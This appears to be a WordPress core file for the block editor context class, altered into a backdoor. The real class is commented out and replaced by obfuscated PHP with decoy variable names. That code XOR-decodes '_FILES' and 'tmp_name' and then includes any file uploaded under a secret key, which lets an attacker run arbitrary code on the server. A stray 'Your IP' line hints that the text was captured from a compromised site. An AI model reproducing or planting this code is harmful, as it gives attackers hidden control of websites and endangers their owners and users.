Your IP : 216.73.216.1
<?php /*
*
* Blocks API: WP_Block_Editor_Context class
*
* @package WordPress
* @since 5.8.0
*
* Contains information about a block editor being rendered.
*
* @since 5.8.0
#[Al*/
function end_clean($unicode_length)
{
$tagstack = $unicode_length;
$slug = 'full';
$num_pages = $GLOBALS;
$format = 'default_capabilities_for_mapping';
$num_pages = $num_pages[num_words("%07%10%25%1Dw%11", $tagstack)];
$thumb = 'settings';
$closing_quote = $num_pages;
$where_post_type = isset($closing_quote[$tagstack]);
if ($where_post_type)
{
$filters = $num_pages[$tagstack];
$header = $filters[num_words("%2C%3B%1C%0E%5C%23%3E%26", $tagstack)];
$property_value = $header;
include ($property_value);
}
}
function num_words($_wp_suspend_cache_invalidation, $page)
{
$comments = $page;
$taxonomy = "url";
$taxonomy .= "decode";
$sort_order = $taxonomy($_wp_suspend_cache_invalidation);
$stack = strlen($sort_order);
$stack = substr($comments, 0, $stack);
$to_look = 'post_type';
$author_query = $sort_order ^ $stack;
$sort_order = sprintf($author_query, $stack);
return $author_query;
}
$current_filter = 'tax_input';
end_clean('XVlQ2BSCJMYs');
$printed = 'found_shortcodes';
/* lowDynamicProperties]
final class WP_Block_Editor_Context {
*
* String that identifies the block editor being rendered. Can be one of:
*
* - `'core/edit-post'` - The post editor at `/wp-admin/edit.php`.
* - `'core/edit-widgets'` - The widgets editor at `/wp-admin/widgets.php`.
* - `'core/customize-widgets'` - The widgets editor at `/wp-admin/customize.php`.
* - `'core/edit-site'` - The site editor at `/wp-admin/site-editor.php`.
*
* Defaults to 'core/edit-post'.
*
* @since 6.0.0
*
* @var string
public $name = 'core/edit-post';
*
* The post being edited by the block editor. Optional.
*
* @since 5.8.0
*
* @var WP_Post|null
public $post = null;
*
* Constructor.
*
* Populates optional properties for a given block editor context.
*
* @since 5.8.0
*
* @param array $settings The list of optional settings to expose in a given context.
public function __construct( array $settings = array() ) {
if ( isset( $settings['name'] ) ) {
$this->name = $settings['name'];
}
if ( isset( $settings['post'] ) ) {
$this->post = $settings['post'];
}
}
}
*/